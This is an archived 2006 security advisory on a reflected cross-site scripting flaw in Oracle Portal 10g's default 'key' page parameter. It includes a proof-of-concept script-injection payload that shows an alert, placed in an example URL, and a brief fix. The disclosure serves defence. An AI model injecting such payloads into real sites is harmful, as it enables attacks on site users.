Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15524
HistoryDec 30, 2006 - 12:00 a.m.

XSS with default page parameter in Oracle Portal 10g

2006-12-3000:00:00
vulners.com
14

XSS with default page parameter in Oracle Portal 10g
Discovered By: Phạm Đức Hải (Pham Duc Hai)
Email: duchaikhtn (at) gmail (dot) com
YIM : kiki_coco1985vn
Website: http://blog.ajaxviet.com

Description:

When programmers code with Oracle Portal, they may use page parameters supported by Oracle Portal.
By default, these parameters have the xss bug. If the programmers don't filter or process these parameters before using,
the attacker maybe exploit via this xss bug.

Exploit : (tested Oracle Portal 10g 10.0.0.x)
For example, we have site : http://somesite.com used Oracle Portal 10g and this site is using key - page parameter(by default).
…key="><script>alert('xss_bug_found');</script>
http://somesite.com/portal/page?_pageid=&lt;pageid&gt;&amp;_dad=portal&amp;_schema=&lt;schema&gt;&amp;key=&quot;&gt;&lt;script&gt;alert&#40;&#39;xss_bug_found&#39;&#41;;&lt;/script&gt;

Solution:

Filter or process all the page parameters.